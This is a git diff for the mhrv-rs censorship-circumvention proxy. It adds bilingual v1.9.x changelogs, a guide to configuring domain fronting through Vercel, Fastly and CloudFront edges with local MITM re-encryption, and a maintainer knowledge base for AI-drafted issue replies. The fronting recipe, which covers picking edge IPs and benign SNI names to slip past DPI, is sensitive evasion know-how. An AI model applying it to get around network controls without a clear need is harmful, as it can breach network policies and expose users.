در docs (README EN/FA, SF_README EN/FA, tunnel-node FA) note "تا قبل v1.9 نام `google_only` بود — هنوز کار می‌کنه" گذاشته شده برای کاربرانی که از راهنماهای قدیمی یا پست‌های Telegram قدیمی استفاده می‌کنن. +• fronting_groups: domain fronting چند-edge برای CDN غیر-Google (Vercel، Fastly، …) (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) از @dazzling-no-more، با credit به [@patterniha/MITM-DomainFronting](https://github.com/patterniha/MITM-DomainFronting) برای technique اصلی): فیلد جدید config `fronting_groups: [{name, ip, sni, domains}]`. هر group شامل (edge IP، front SNI، domain‌های member). وقتی CONNECT به یکی از domain‌های member می‌رسه، proxy MITM می‌کنه + upstream با `ip` به‌عنوان TCP destination + `sni` به‌عنوان TLS SNI re-encrypt می‌کنه — همان trick که برای `google_ip` + `front_domain` می‌کنیم، حالا قابل تنظیم برای هر CDN multi-tenant. بر روی Google fronting (built-in) برتری داره؛ زیر `passthrough_hosts` و DoH bypass قرار داره. در `mode = full` غیر فعال (که end-to-end TLS رو حفظ می‌کنه + MITM نمی‌کنه). config مثال: `config.fronting-groups.example.json`. doc کامل: `docs/fronting-groups.md` شامل recipe انتخاب `(ip, sni)`، routing precedence، و warning صریح ⚠️ درباره cross-tenant Host-header leak failure mode (هرگز domain‌هایی که واقعاً روی edge نیستند رو list نکنید). reviews folded: SNI اعتبار رستورد روی config-load gate، `Vec>` به‌جای clone-on-match، byte-level dot-anchored matcher، startup warnings برای inert combos. +• edge-cache DNS در CodeFull.gs برای skip کردن round-trip tunnel-node (PR [#494](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/494) از @dazzling-no-more): `udp_open` ops با port=53 در `_doTunnelBatch` intercept می‌شن + از `CacheService` (cache hit) یا DoH (cache miss) سرو می‌شن. cache hit‌ها latency typical first-hop DNS رو از ~۶۰۰-۱۲۰۰ms به ~۲۰۰-۴۰۰ms پایین می‌آرن. تغییر pure server-side در CodeFull.gs (فقط Full mode — apps_script mode UDP path نداره). بدون تغییر Rust/client. DoH fallback chain: Cloudflare → Google → Quad9 روی RFC 8484 GET. cache key per-qtype برای جلوگیری از A/AAAA collision. TTL clamping در `[30s, 6h]`. NXDOMAIN/SERVFAIL با ۴۵s negative cache. NODATA-with-SOA بر اساس RFC 2308 §5 SOA TTL رو honor می‌کنه. default-on، opt-out با `ENABLE_EDGE_DNS_CACHE`. هر failure mode به path forward موجود tunnel-node fallback می‌کنه (zero regression). انتخاب CacheService بر روی Sheets به دلیل سرعت (~۱۰ms) + privacy (volatile، روی Drive log persist نمی‌کنه — برای کاربران در صحنه‌های censorship مهمه). ۱۱ تست pure-JS pass. +• default `tunnel_doh: true` (flipped از `false` در v1.8.x) ([#468](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/468)): default قبلی (DoH bypass فعال) برای کاربران ایرانی بدون نشان دادن چیزی شکست می‌خورد چون Iran ISP direct connection به `dns.google`، `chrome.cloudflare-dns.com` و سایر pinned DoH hosts رو filter می‌کنن — همان hosts که bypass در حال route مستقیم می‌فرستاد. در نتیجه، DNS lookup‌ها fail می‌گرفتن + browsing شکست می‌خورد. حالا default safe است (DoH داخل tunnel نگه داشته می‌شه، در یک شبکه فیلتر شده کار می‌کنه). کاربری روی شبکه‌هایی که direct DoH کار می‌کنه (non-Iran)، می‌تونه `tunnel_doh: false` در config بگذاره برای latency win. تغییر backwards-compatible برای configs موجود — همه‌ی configs دارای فیلد explicit `tunnel_doh` رفتار حفظ می‌شن. +• اشتراک‌گذاری Hotspot iOS/laptop (PR [#483](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/483) از @yyoyoian-pixel): default `listen_host` از `127.0.0.1` به `0.0.0.0` تغییر کرده. این workflow معمول رو enable می‌کنه — یک phone Android که tunnel run می‌کنه، iPhone یا laptop روی همان hotspot WiFi می‌تونه از proxy استفاده کنه. configs قدیمی با explicit `listen_host: "127.0.0.1"` honor می‌شن (بازنویسی نمی‌شن). +--- +• **Minor breaking: `mode = "google_only"` renamed to `mode = "direct"`** (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) by @dazzling-no-more): the old name no longer described the mode now that `fronting_groups` reaches more than Google. Rust + Android + UI dropdown all updated, but **`google_only` is preserved as a deprecated alias on parse** — existing configs and saved settings don't break. On the next Save, the on-disk file migrates automatically to `direct`. Docs (README EN+FA, SF_README EN+FA, tunnel-node FA) carry a "was named `google_only` before v1.9 — old name still works" note so users following older guides / Telegram posts find their way. +• `fronting_groups`: multi-edge domain fronting for non-Google CDNs (PR [#488](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/488) by @dazzling-no-more, credit to [@patterniha/MITM-DomainFronting](https://github.com/patterniha/MITM-DomainFronting) for the original technique): new config field `fronting_groups: [{name, ip, sni, domains}]`. Each group is `(edge IP, front SNI, member domains)`: when a CONNECT to one of the member domains arrives, the proxy MITMs at the local CA, then re-encrypts upstream against `ip` with `sni` as the TLS SNI — same trick we already do for `google_ip` + `front_domain`, now configurable for any multi-tenant CDN edge (Vercel, Fastly, etc.). Wins over the built-in Google SNI-rewrite suffix list; loses to `passthrough_hosts` and DoH bypass. Skipped in `mode = full` (which preserves end-to-end TLS and can't MITM). Working example at `config.fronting-groups.example.json`. Full doc at `docs/fronting-groups.md` including the recipe for picking `(ip, sni)`, routing precedence, and an explicit ⚠️ warning about the cross-tenant Host-header leak failure mode (don't list domains that aren't actually on the edge). Review fixes folded: SNI validated via rustls at config-load gate; `Vec>` refcount on per-CONNECT match; byte-level dot-anchored matcher (no per-match `format!()`); startup warnings for inert combos. +• Edge-cache DNS in `CodeFull.gs` to skip the tunnel-node round-trip (PR [#494](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/494) by @dazzling-no-more): intercepts `udp_open` / port=53 ops in `_doTunnelBatch` and serves them from `CacheService` (cache hit) or DoH (cache miss). Cache hits drop typical first-hop DNS latency from ~600-1200ms to ~200-400ms. Pure server-side change in `CodeFull.gs` (Full mode only — apps_script mode has no UDP path); zero Rust/client changes. DoH fallback chain: Cloudflare → Google → Quad9 over RFC 8484 GET. Per-qtype cache key keeps A and AAAA from colliding. Min RR TTL clamped to `[30s, 6h]`; NXDOMAIN/SERVFAIL get a 45s negative cache; NODATA-with-SOA honors the SOA TTL per RFC 2308 §5. Default-on, opt-out via `ENABLE_EDGE_DNS_CACHE`. Every failure mode (parse error, resolver outage, key-too-long, `cache.put` rejection) falls through to the existing tunnel-node forward path — zero regression on any failure. CacheService chosen over Sheets (#443's pattern) because Sheets reads/writes are 100-500ms per op (often slower than the DoH lookup we'd be caching), have a daily-quota hazard, and persist a Drive-listed log of every domain users resolve — a real privacy regression for users in censorship contexts. CacheService is ~10ms, volatile, free, no on-disk artifact. 11 pure-JS tests covering parsers, txid non-mutation, TTL clamp, NXDOMAIN-with-SOA TTL extraction, malformed/truncated input rejection, splice correctness for mixed batches. +• Default `tunnel_doh: true` (flipped from `false` in v1.8.x) ([#468](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/468)): the previous default (DoH bypass active) silently broke for Iranian users because Iran ISPs filter direct connections to `dns.google`, `chrome.cloudflare-dns.com`, and other pinned DoH hosts — exactly the hosts the bypass was routing direct. DNS resolution failed and browsing broke. The safer default keeps DoH inside the tunnel; users on networks where direct DoH works can opt back into the bypass with `tunnel_doh: false`. Backwards-compatible for existing configs — anyone who explicitly set `tunnel_doh` keeps their behavior. Iranian users on pre-v1.8.6 versions hitting this regression should upgrade. +• Hotspot sharing for iOS / laptop (PR [#483](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/483) by @yyoyoian-pixel): default `listen_host` changed from `127.0.0.1` to `0.0.0.0`. Enables the common workflow where an Android phone runs the tunnel and an iPhone/iPad/laptop on the same hotspot uses it as a proxy (HTTP `192.168.43.1:8080` or SOCKS5 `:1081`). For full device-wide coverage on iOS, Shadowrocket or Potatso create a local VPN that routes all traffic through the SOCKS5 on the Android phone. Old configs with explicit `"listen_host": "127.0.0.1"` are honored (not overwritten). diff --git a/docs/changelog/v1.9.1.md b/docs/changelog/v1.9.1.md new file mode 100644 index 00000000..675d549c --- /dev/null +++ b/docs/changelog/v1.9.1.md @@ -0,0 +1,10 @@ + +• tunable کردن آستانه auto-blacklist با ۳ field config جدید: `auto_blacklist_strikes` (default 3)، `auto_blacklist_window_secs` (default 30)، `auto_blacklist_cooldown_secs` (default 120) ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)، [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): تا قبل، threshold روی ۳ timeout در ۳۰ ثانیه = ۱۲۰ ثانیه cooldown hard-coded بود. کاربران single-deployment گزارش دادن این threshold روی شبکه‌های flaky too aggressive هست — یک cold-start stall + دو network blip → فقط deployment آن‌ها lockout می‌شه. حالا قابل تنظیم: single-deployment users می‌تونن `auto_blacklist_strikes: 5` یا `auto_blacklist_cooldown_secs: 30` بزارن. کاربران multi-deployment با ۱۰+ alternatives می‌تونن `auto_blacklist_strikes: 2` بزارن برای fail-fast. defaults رفتار قدیمی رو حفظ می‌کنن — هیچ کاربری چیزی notice نمی‌کنه مگر در config صریح override کنه. کاربر در UI form expose نشده — power-user file edit در config.json. clamp [1, 86400] برای جلوگیری از مقادیر غیرمعقول. +• `request_timeout_secs` config (default 30) برای تنظیم batch HTTP timeout ([#430](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/430)، masterking32 PR #25): تا قبل `BATCH_TIMEOUT = 30s` hard-coded. شبکه‌های Iran ISP slow ممکنه `45` یا `60` بخوان تا Apps Script پیغام ارسال کنه past throttle window. شبکه‌های با fail-fast preference ممکنه `15` بخوان برای retry سریع‌تر هنگام hang. clamp [5s, 300s]. برای کاربر در UI form expose نشده. +• warning روشن‌تر در tunnel-node startup برای recurring `MHRV_AUTH_KEY` typo ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391)، [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): چندین قدیمی copy-paste guide از `MHRV_AUTH_KEY` به‌جای `TUNNEL_AUTH_KEY` در docker run استفاده می‌کرد. tunnel-node اون env var رو هرگز نمی‌خوند + silently default `changeme` رو fallback می‌کرد، که باعث AUTH_KEY-mismatch decoy می‌شد در client. حالا اگر `MHRV_AUTH_KEY` set باشه ولی `TUNNEL_AUTH_KEY` نباشه، tunnel-node پیغام specific می‌ده: "MHRV_AUTH_KEY is set but TUNNEL_AUTH_KEY is not — tunnel-node only reads TUNNEL_AUTH_KEY (uppercase, with underscores). Rename your env var: docker run ... -e TUNNEL_AUTH_KEY=...". این به کاربر مستقیم کمک می‌کنه به‌جای ساعت‌ها debug. +• run.bat fallback به CLI بعد از UI failure ([#417](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/417)، [#426](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/426)، [#487](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/487)): قبلاً وقتی هر دو UI renderer (glow + wgpu) fail می‌گرفتن (روی ماشین‌های قدیمی Windows / RDP / VM بدون GPU)، script پیغام "open issue" می‌داد + exit. حالا بعد از پیغام error، CLI `mhrv-rs.exe` رو خود اجرا می‌کنه + کاربر می‌تونه به استفاده از proxy ادامه دهد. CLI همان full functionality رو داره بدون UI shell — proxy روی `127.0.0.1:8085` (HTTP) و `127.0.0.1:8086` (SOCKS5). +--- +• Tunable auto-blacklist threshold via three new config fields: `auto_blacklist_strikes` (default 3), `auto_blacklist_window_secs` (default 30), `auto_blacklist_cooldown_secs` (default 120) ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391), [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): previously hard-coded at "3 timeouts in 30s = 120s cooldown". Single-deployment users reported this threshold was too aggressive on flaky networks — one cold-start stall plus two transient network blips would lock them out of their only relay path. Now tunable: single-deployment users can set `auto_blacklist_strikes: 5` or `auto_blacklist_cooldown_secs: 30` to be more forgiving. Multi-deployment users with 10+ healthy alternatives can set `auto_blacklist_strikes: 2` to fail-fast. Defaults preserve existing behavior — no user notices a change unless they explicitly tune in `config.json`. Not exposed in the UI form yet — power-user file edit. Clamped to [1, 86400] for the duration fields to prevent absurd values. +• `request_timeout_secs` config field (default 30) to tune the batch HTTP timeout ([#430](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/430), masterking32 PR #25): previously the hard-coded `BATCH_TIMEOUT = 30s` constant. Slow Iran ISP networks may want `45` or `60` to give Apps Script time to respond past throttle windows. Networks preferring fail-fast may want `15` to retry sooner when a deployment hangs. Clamped to [5s, 300s] (anything beyond exceeds Apps Script's 6-min hard cap with no benefit). Not in the UI form. +• Clearer tunnel-node startup warning for the recurring `MHRV_AUTH_KEY` typo ([#391](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/391), [#444](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/444)): several older copy-paste guides used `MHRV_AUTH_KEY` instead of `TUNNEL_AUTH_KEY` in `docker run`. tunnel-node never read that env var and silently fell back to default `changeme`, producing baffling AUTH_KEY-mismatch decoys on the client. Now if `MHRV_AUTH_KEY` is set but `TUNNEL_AUTH_KEY` is not, tunnel-node emits a specific warning: `"MHRV_AUTH_KEY is set but TUNNEL_AUTH_KEY is not — tunnel-node only reads TUNNEL_AUTH_KEY (uppercase, with underscores). Rename your env var: docker run ... -e TUNNEL_AUTH_KEY="`. Saves users hours of debugging the wrong layer. +• `run.bat` falls back to CLI after UI renderer failure ([#417](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/417), [#426](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/426), [#487](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/487)): when both UI renderers (glow + wgpu) fail on older Windows machines, RDP sessions, or VMs without GPU acceleration, the script previously printed an "open an issue on GitHub" message and exited. Now it prints the diagnostic info AND launches `mhrv-rs.exe` (CLI) so the user can keep using the proxy without the UI shell. CLI has the same proxy functionality on `127.0.0.1:8085` (HTTP) and `127.0.0.1:8086` (SOCKS5); only the visual UI is missing. diff --git a/docs/changelog/v1.9.2.md b/docs/changelog/v1.9.2.md new file mode 100644 index 00000000..7fe74aba --- /dev/null +++ b/docs/changelog/v1.9.2.md @@ -0,0 +1,4 @@ + +• backend جایگزین Apps Script + Cloudflare Worker (PR [#533](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/533) از @dazzling-no-more): deploy `Code.cfw.gs` (variant جدید GAS در `assets/apps_script/`) + `worker.js` (Cloudflare Worker در `assets/cloudflare/`)، Apps Script یک layer thin auth+forward می‌شه که outbound fetch رو به CF edge می‌ده. mhrv-rs خود **بدون تغییر** — همان envelope JSON روی wire، همان `mode: "apps_script"`، `script_id`، `auth_key`. تنها تفاوت چیزی هست که Apps Script deployed بعد از authentication انجام می‌ده. این task audit در roadmap [#380](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/380) / [#393](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/393) رو close می‌کنه. **چرا** کاربران Persian گزارش دادن GAS+CFW combination از pure GAS برای browsing + chat-style سریع‌تر حس می‌شه. **سختگیر شده over upstream [denuitt1/mhr-cfw](https://github.com/denuitt1/mhr-cfw)**: per-request AUTH_KEY check (upstream omit می‌کرد → relay open اگر URL leak شد)، fail-closed اگر AUTH_KEY هنوز placeholder باشه، loop guard `x-relay-hop` + self-host fetch block، body drop on GET/HEAD برای match با Code.gs/UrlFetchApp permissiveness، SKIP_HEADERS parity، batch handler با `Promise.all` + soft cap `MAX_BATCH_SIZE = 40`. **محدودیت‌های صادقانه** (در docs explicit): با `mode: "full"` ناسازگار است (فقط HTTP-relay path port شده، نه raw-TCP/UDP tunnel ops). YouTube long-form بدتر می‌شه (30s CF Worker wall vs Apps Script ~6min — SABR cliff زودتر می‌رسه). Cloudflare anti-bot اثر معکوس داره (Worker IP اغلب stricter از Google IP). Day-one quota relief نیست (path batch ready ولی از client شیپ شده single-shape unreachable). **docs کامل** انگلیسی + فارسی در `assets/cloudflare/README.md` + `README.fa.md` شامل setup، model security سه AUTH_KEY match، trade-off table، Full mode incompatibility. +--- +• Apps Script + Cloudflare Worker alternative backend (PR [#533](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/533) by @dazzling-no-more): deploy `Code.cfw.gs` (new GAS variant in `assets/apps_script/`) plus `worker.js` (Cloudflare Worker in `assets/cloudflare/`), and Apps Script becomes a thin auth+forward layer that pushes the outbound fetch to CF's edge. mhrv-rs itself is **unchanged** — same JSON envelope on the wire, same `mode: "apps_script"`, `script_id`, `auth_key`. The only difference is what the deployed Apps Script does after it authenticates. Closes the audit task on the v1.9.x roadmap ([#380](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/380), [#393](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/393)). **Why**: recurring Persian-community feedback reports that GAS+CFW combination feels noticeably faster than plain GAS for browsing and chat-style workloads. **Hardened over upstream [denuitt1/mhr-cfw](https://github.com/denuitt1/mhr-cfw)**: per-request `AUTH_KEY` check (upstream omitted → open relay if URL leaks), fail-closed if `AUTH_KEY` still equals the placeholder, `x-relay-hop` loop guard + self-host fetch block, drops body on GET/HEAD to match `Code.gs`/UrlFetchApp permissiveness, SKIP_HEADERS parity, batch handler with `Promise.all` + soft cap `MAX_BATCH_SIZE = 40`. **Honest limitations called out in docs**: not compatible with `mode: "full"` (only HTTP-relay path ported; raw-TCP / UDP tunnel ops needed for messengers under Android full-mode aren't). YouTube long-form gets worse (30 s CF Worker wall vs Apps Script's ~6 min — SABR cliff arrives sooner). Cloudflare anti-bot is unaffected — exit IP becomes a Workers IP, which CF's anti-bot fingerprints as worker-internal (often stricter than a Google IP). No day-one `UrlFetchApp` daily-count relief; the batch-aware GAS+Worker path is wired and ready (`ceil(N / 40)` per N-URL batch) but unreachable from any shipping client today (mhrv-rs's HTTP-relay path is single-shape only). **Full docs** in English + Persian at `assets/cloudflare/README.md` + `README.fa.md` covering setup, the three-matching-`AUTH_KEY`s security model, trade-off table, full-mode incompatibility section. README updated with alternative-backend callout in both languages. diff --git a/docs/fronting-groups.md b/docs/fronting-groups.md new file mode 100644 index 00000000..ac57c230 --- /dev/null +++ b/docs/fronting-groups.md @@ -0,0 +1,143 @@ +# Multi-edge fronting groups + +The default mhrv-rs SNI-rewrite path targets Google's edge: TLS goes out +with `SNI=www.google.com` to a Google IP, the inner `Host` header (after +the local MITM CA terminates the browser's TLS) names the real +destination, and Google's frontend routes by `Host`. That's how +`www.youtube.com`, `script.google.com`, and friends reach you despite a +DPI box that drops anything not SNI'd as `www.google.com`. + +The same trick works on any multi-tenant CDN edge that: + +1. serves multiple tenant domains on the same IP pool, and +2. dispatches to the right backend by inner HTTP `Host`, and +3. presents a TLS cert whose name matches the SNI you choose. + +Vercel, Fastly, and AWS CloudFront (which is what Netlify-hosted sites +sit behind) all fit the bill. Pick a benign-looking domain hosted on +the same edge, use it as the SNI, and you can route many other domains +on that edge through the same tunnel without burning Apps Script quota. + +## Config shape + +```jsonc +{ + "mode": "direct", // or apps_script / full + "fronting_groups": [ + { + "name": "vercel", // free-form, used in logs + "ip": "76.76.21.21", // a Vercel edge IP + "sni": "react.dev", // a Vercel-hosted domain + "domains": [ // hosts to route via this group + "vercel.com", "vercel.app", + "nextjs.org", "now.sh" + ] + } + ] +} +``` + +`domains` matches case-insensitively, exact OR dot-anchored suffix — +`vercel.com` covers both `vercel.com` and `*.vercel.com`. First group +in the list whose member matches wins. + +A working example is shipped at `config.fronting-groups.example.json`. + +## Picking the (ip, sni) pair + +The SNI must be a real, currently-live domain on the same edge. rustls +validates the upstream cert against the SNI you send; if the edge +returns a cert that doesn't cover that name, the handshake fails. So +the recipe is: + +1. Pick the target edge (Vercel, Fastly, …). +2. Find a neutral, never-blocked domain hosted there. Vercel: `react.dev`, + `nextjs.org`. Fastly: `www.python.org`, `pypi.org`. AWS CloudFront + (where Netlify lives): `letsencrypt.org`, `aws.amazon.com`. +3. Resolve that domain (`dig +short react.dev A`) — pick one IP, drop + it in `ip`. +4. List the domains you actually want to reach via this edge in + `domains` — **only domains you've verified are hosted on the same + edge as `sni`** (see warning below). + +Edge IPs rotate. If a group's `ip` stops working, re-resolve the SNI +domain and update the config — IP rotation per-group is on the +roadmap but not implemented yet. + +## ⚠️ Cross-tenant leak: don't list domains that aren't on the edge + +If you put a domain in `domains` that is **not** actually hosted on the +edge you've configured, two things happen, both bad: + +1. **Privacy leak.** The proxy completes a TLS handshake with the edge + (validated against `sni`, which IS on the edge), then sends `Host: + ` inside that encrypted stream. The edge — which is + not your-domain's host — now sees a request labelled with + your-domain's name. From the edge's perspective, *you* deliberately + sent that request to them. Vercel/Fastly logs will show your-domain + in their access logs, attributable to your IP and timestamps. + +2. **UX failure.** The edge has no backend for your-domain, so it + returns its default 404 / wrong-tenant page. The site appears + "broken via mhrv-rs" but works fine over a normal connection, + which is confusing to debug. + +**Verify before listing.** A simple check: if `dig +short your-domain +A` returns an IP that's *also* one of the edge's IPs, you're fine. If +the IPs differ, your-domain is hosted somewhere else and listing it +will leak. This is also why the upstream MITM-DomainFronting Xray +config uses `verifyPeerCertByName` with an explicit SAN allowlist — +it's a second guard against accidentally fronting unrelated domains +through the same edge. mhrv-rs leaves verification to rustls + the +SNI you send; the leak guard is "you, the operator, listing only +domains you've verified." + +Only listed domains are routed to the group. Anything else falls +through to the next dispatch step (Google SNI-rewrite or Apps Script +relay), so unrelated traffic does NOT accidentally hit a group's edge. + +## Routing precedence + +Within a single CONNECT, the dispatch order is: + +1. `passthrough_hosts` — explicit user opt-out. +2. DoH bypass (port 443, known DoH host). +3. `mode = full` — everything via the batch tunnel mux. +4. **`fronting_groups` match (port 443).** — this feature. +5. Built-in Google SNI-rewrite suffix list (port 443). +6. `mode = direct` fallback → raw TCP. +7. `mode = apps_script` peek + relay. + +So fronting groups beat the Google-edge default for hosts they list, +but lose to user-explicit passthrough/DoH choices. Putting `vercel.com` +in a Vercel fronting group will route Vercel traffic through Vercel's +edge directly, not through the Apps Script relay or the Google edge. + +## Limitations / what's not here yet + +- **Single IP per group.** Real edges have many; we'll add a pool with + health-checking when there's a clear need. Workaround: when the + configured IP starts failing, swap it. +- **No bundled domain catalog.** The upstream Xray config uses + `geosite:vercel` / `geosite:fastly` lists from a binary geosite + database — we don't ship that, you list domains explicitly. +- **No UI editor.** Edit `config.json` directly. The UI's Save path + preserves your `fronting_groups` block (round-tripped) — it just + doesn't render an editor for it. +- **Browsers only for Android non-root**, same as the Google path — + third-party apps that don't trust user CAs (Telegram, Instagram, …) + can't be MITM'd, so this trick doesn't help them. +- **Cert verification matches the SNI.** No per-group SAN allowlist + (their `verifyPeerCertByName`); the SNI you send IS what rustls + validates against. If you want stricter pinning, set `verify_ssl: + false` is the wrong answer — instead, pick an SNI whose cert + genuinely covers your targets. + +## Credit + +The technique is the same one [@masterking32]'s original +MasterHttpRelayVPN demonstrated for Google's edge. The Vercel + +Fastly extension and the matching Xray config came from +[@patterniha]'s [MITM-DomainFronting](https://github.com/patterniha/MITM-DomainFronting) +project — this `fronting_groups` field is a Rust port of that idea +into mhrv-rs's existing dispatcher. diff --git a/docs/maintainer/README.md b/docs/maintainer/README.md new file mode 100644 index 00000000..5639af45 --- /dev/null +++ b/docs/maintainer/README.md @@ -0,0 +1,18 @@ +# Maintainer knowledge base + +Project-internal knowledge base for triaging issues, reviewing PRs, cutting releases, and writing user-facing replies in the project's voice. Treat this as canonical context for any maintenance work — local or automated. + +## Read order + +Start with `SKILL.md` for orientation, conventions, and pointers. Then read references lazily as relevant to the current task: + +- `references/architecture.md` — apps_script vs Full mode, MITM CA, tunnel-node, AUTH_KEY/TUNNEL_AUTH_KEY/DIAGNOSTIC_MODE, SNI rewriting, Apps Script's hidden constraints +- `references/issue-patterns.md` — recurring user issue patterns with diagnostic procedures and canonical reply structures +- `references/diagnostic-taxonomy.md` — six candidate causes for the placeholder body, DIAGNOSTIC_MODE disambiguator +- `references/workflow-conventions.md` — reply marker, Persian/English match rule, changelog format, commit messages, close reasons +- `references/release-workflow.md` — Cargo.toml → tag → Telegram pipeline +- `references/contributors.md` — core contributor roles + their substantive PRs +- `references/roadmap.md` — current and upcoming release batches +- `references/persian-templates.md` — adaptable Persian reply templates and standardized phrasings +- `assets/changelog-template.md` — starter template for a new `docs/changelog/vX.Y.Z.md` +- `assets/reply-marker.md` — the standard reply footer diff --git a/docs/maintainer/SKILL.md b/docs/maintainer/SKILL.md new file mode 100644 index 00000000..e24568b6 --- /dev/null +++ b/docs/maintainer/SKILL.md @@ -0,0 +1,114 @@ +# mhrv-rs maintenance + +This document encodes the project context, recurring patterns, and conventions needed to ship code, triage issues, and respond to users effectively. It is the entry point to the broader knowledge base in `references/`. + +## Why this matters + +mhrv-rs is **infrastructure for circumvention**. The bulk of the userbase is in Iran — under one of the world's heaviest internet censorship regimes — using this tool to reach YouTube, Wikipedia, Telegram, GitHub, news sites, banking, and (critically) to communicate with family abroad. A non-trivial fraction of users are in Russia, China, Belarus, and other censored networks, but Iran dominates the issue tracker. + +The architecture's importance is the architecture itself: by routing traffic through Google Apps Script, the user's ISP only sees encrypted HTTPS to Google IPs (`216.239.38.120` etc.) — the exact same fingerprint as `www.google.com`. ISPs that block conventional VPNs are forced to either let mhrv-rs through or break Google access for the entire country. This asymmetry is what makes the project work, and it shapes every architectural decision. + +When responding to a Persian-language issue, the responder is often the only English-speaking maintainer the reporter has access to. Be clear, generous, and specific. When shipping a release, you're shipping it to people for whom the alternative is not "use a different tool" but "lose internet access". This drives the project's bias toward shipping over polish, toward backwards-compatible defaults, and toward documenting workarounds even when the proper fix is months away. + +## Working directory and conventions + +This is a standard Rust project. `cd` into your local clone before running git/gh/cargo commands, or use absolute paths. Reply markdown files for `gh issue comment --body-file` are conventionally written to a temporary file (e.g., `/tmp/...`) before posting, to avoid HEREDOC quoting issues with backticks and `$()` substitutions. + +## Reference files (read as needed) + +This knowledge base is structured for progressive disclosure. The body below covers conventions and reflexes; the reference files have the deep context for specific tasks. Read them lazily — only the ones relevant to what you're doing. + +- **`references/architecture.md`** — Read when explaining the system to a user, debugging unfamiliar log patterns, or making an architectural decision. Covers domain fronting, apps_script vs Full mode, MITM CA, tunnel-node, the AUTH_KEY/TUNNEL_AUTH_KEY/DIAGNOSTIC_MODE distinction, SNI rewriting, and `google_ip` rotation. +- **`references/issue-patterns.md`** — Read when triaging a new issue. Catalogs the most common user-reported issue patterns with diagnostic procedures and canonical reply structures. +- **`references/diagnostic-taxonomy.md`** — Read when a user shows a failure log with `no json in batch response` or HTML body. The six candidate causes for the placeholder body, what each looks like, and how `DIAGNOSTIC_MODE=true` disambiguates them. +- **`references/workflow-conventions.md`** — Read when writing a reply, changelog, or commit message. Reply marker, Persian-vs-English language convention, changelog format, semver discipline. +- **`references/release-workflow.md`** — Read when cutting a release. Cargo.toml bump → changelog → commit → tag → push, then auto-fired CI handles the rest (release builds + Telegram channel publishing). +- **`references/contributors.md`** — Read when interacting with named contributors. Each top contributor has a domain they specialize in. +- **`references/roadmap.md`** — Read when categorizing a feature request. Current and upcoming release batches. +- **`references/persian-templates.md`** — Read when writing a Persian reply. Common phrases and full-paragraph templates for the most-repeated Persian-language situations. +- **`assets/changelog-template.md`** — Use as the starting template when creating a new `docs/changelog/vX.Y.Z.md` file. +- **`assets/reply-marker.md`** — The exact reply footer to append to every issue/PR comment. + +## Conventions to internalize + +These show up so frequently they should be memorized rather than looked up each time. + +### The reply marker + +Every substantive issue or PR comment ends with this exact footer (with a literal `---` HR before it): + +``` +--- +[reply via Anthropic Claude | reviewed by @therealaleph] +``` + +This is non-negotiable. Users in this community recognize the marker. It signals that the reply was drafted by Claude and reviewed by the maintainer before posting. Don't omit it, don't paraphrase it, don't translate "reviewed by" into Persian. + +### Persian or English: match the user + +If the user wrote in Persian, reply in Persian. If they wrote in English, reply in English. If they mixed (common), match the dominant language. Never assume Iranian users want English — many are more comfortable in Persian and the message lands better in their language. + +Code blocks, command examples, technical terms (`AUTH_KEY`, `script_id`, `parallel_concurrency`), URLs, and the reply marker always stay in their original Latin form. Don't translate them. + +### Public artifact tone + +Anything that goes into the public repo — issue replies, PR comments, commit messages, PR descriptions, changelogs — is full prose, written warmly and clearly. Persian or English, adjust to the user. Iranian users especially read carefully and brevity reads as cold or dismissive in this context. Use full sentences. Explain reasoning. Be patient. + +### Semver discipline + +The project uses `vX.Y.Z` strictly: +- **X (major)** — currently `1`. Bump only on a true ABI/protocol break with the Apps Script side. +- **Y (minor)** — feature batch. Bump when shipping a coherent set of features (e.g. v1.7 → v1.8). +- **Z (patch)** — small fix or single-feature addition that doesn't justify a minor bump. Most releases are patch bumps. + +Patch releases (v1.8.1, v1.8.2, v1.8.3) ship continuously — every time something user-visible lands. Don't sit on completed work; releases are cheap and Iranian users who ask "when's the fix shipping?" deserve "in the next 30 minutes" not "next week". The release CI is fast (~30 min from tag push to Telegram publish). + +### Persian-then-English changelog + +Every changelog file in `docs/changelog/vX.Y.Z.md` follows this exact format: + +```markdown + +• [bullet 1 in Persian] +• [bullet 2 in Persian] +--- +• [same bullet 1 in English] +• [same bullet 2 in English] +``` + +Persian comes first because the userbase is majority-Persian. The English version is for international contributors and the public repo audience. Both versions cover the same content but are written natively in each language — not machine-translated. + +### When to close issues + +Close immediately: +- **Resolved** — user confirmed fix works (`gh issue close N --reason completed`) +- **Duplicate** — point to canonical thread (`gh issue close N --reason "not planned"`) +- **Architectural limit** — feature can't be implemented due to Apps Script restrictions (close with explanation, mark as `not planned`) + 